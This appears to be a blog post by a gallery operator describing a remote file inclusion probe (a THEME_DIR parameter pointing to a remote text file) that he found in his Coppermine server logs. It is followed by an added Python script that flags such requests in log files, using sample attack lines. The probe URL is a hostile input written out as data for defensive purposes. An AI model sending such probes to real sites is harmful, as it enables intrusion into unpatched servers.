I’m hyper-paranoid about security issues in Coppermine as I’ve hacked Coppermine so significantly that it’s going to be a little problematic if I ever need to upgrade to a newer version or apply any security patches.
Today in my server log I noticed requests for the following URL:
/modules/coppermine/themes/default/theme.php?THEME_DIR=http://*****.com/fx29id2.txt??
This looks to be some kind of injection attack on Coppermine’s default theme. Fortunately the hacks I’ve done to give Coppermine search engine friendly URLs seem to have protected me (assuming the version I’m running was ever vulnerable in the first place).
Anyway, I did some Googling for Fx29ID and found this blog post. It looks to be a rather sophisticated web server based exploit/scanning tool. This is the kind of thing we have had to contend with at Digital Crocus occasionally. It’s one of the risks of allowing customers to upload whatever software they want onto our server – our users will often not bother to upgrade their blogs/galleries/forums/etc. to the latest versions. This often leaves them vulnerable to various kinds of code injection attacks – very occasionally, it leaves our entire server vulnerable.
When I started making modifications to Coppermine’s code I was fully aware of the nightmare that would ensue when the day inevitably came that there was a significant security vulnerability in Coppermine. For that reason I’ve been keeping a very close eye on any new releases of Coppermine. So far there have been no new releases since I first set up my gallery, so I’m assuming that even if my hacks to Coppermine’s URL scheme hadn’t protected me, the version I’m running probably isn’t vulnerable to that injection attack anyway. It is however quite nice to know that the fact that I’ve changed most of Coppermine’s URLs will protect me from a lot of the automated scanners anyway.
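An added example, not code from the original post: a log check for the request pattern quoted above, where a query parameter such as THEME_DIR carries a remote URL as its value. The sample log lines, host names and the URL_PARAMS_OK allow-list are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl

# Request field of a Common/Combined Log Format line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A parameter whose decoded value starts with a remote scheme is the probe signature.
REMOTE_VALUE_RE = re.compile(r"^\s*(?:https?|ftp)://", re.IGNORECASE)
# Hypothetical allow-list: parameters on this site that legitimately carry URLs.
URL_PARAMS_OK = {"url"}

# Constructed sample log lines (documentation IPs and hosts, not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2008:10:00:00 +0000] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://scanner.example/fx29id2.txt?? HTTP/1.1" 404 512
192.0.2.11 - - [01/Jan/2008:10:00:05 +0000] "GET /gallery/displayimage.php?album=3&pos=1 HTTP/1.1" 200 8192
192.0.2.12 - - [01/Jan/2008:10:00:09 +0000] "GET /index.php?page=hTTp%3A%2F%2Fscanner.example%2Fx.txt%3F HTTP/1.0" 200 1024
192.0.2.13 - - [01/Jan/2008:10:00:12 +0000] "GET /out.php?url=http://www.example.org/ HTTP/1.1" 302 0
"""

def remote_url_params(target):
    """Return (path, [(param, value)]) for parameters holding a remote URL."""
    path, _, query = target.partition("?")
    # parse_qsl percent-decodes each value once, so http%3A%2F%2F is caught too.
    hits = [(name, value)
            for name, value in parse_qsl(query, keep_blank_values=True)
            if name not in URL_PARAMS_OK and REMOTE_VALUE_RE.match(value)]
    return path, hits

def scan_log(lines):
    """Return (client, path, param, value) for every suspicious parameter."""
    findings = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue  # malformed line or a method we do not track
        client = line.split(" ", 1)[0]
        path, hits = remote_url_params(m.group(1))
        findings.extend((client, path, n, v) for n, v in hits)
    return findings

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG.splitlines()):
        print(*finding, sep="\t")
```

Grouping the findings by path shows which installed applications the scanners are targeting, which helps decide what to upgrade first.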






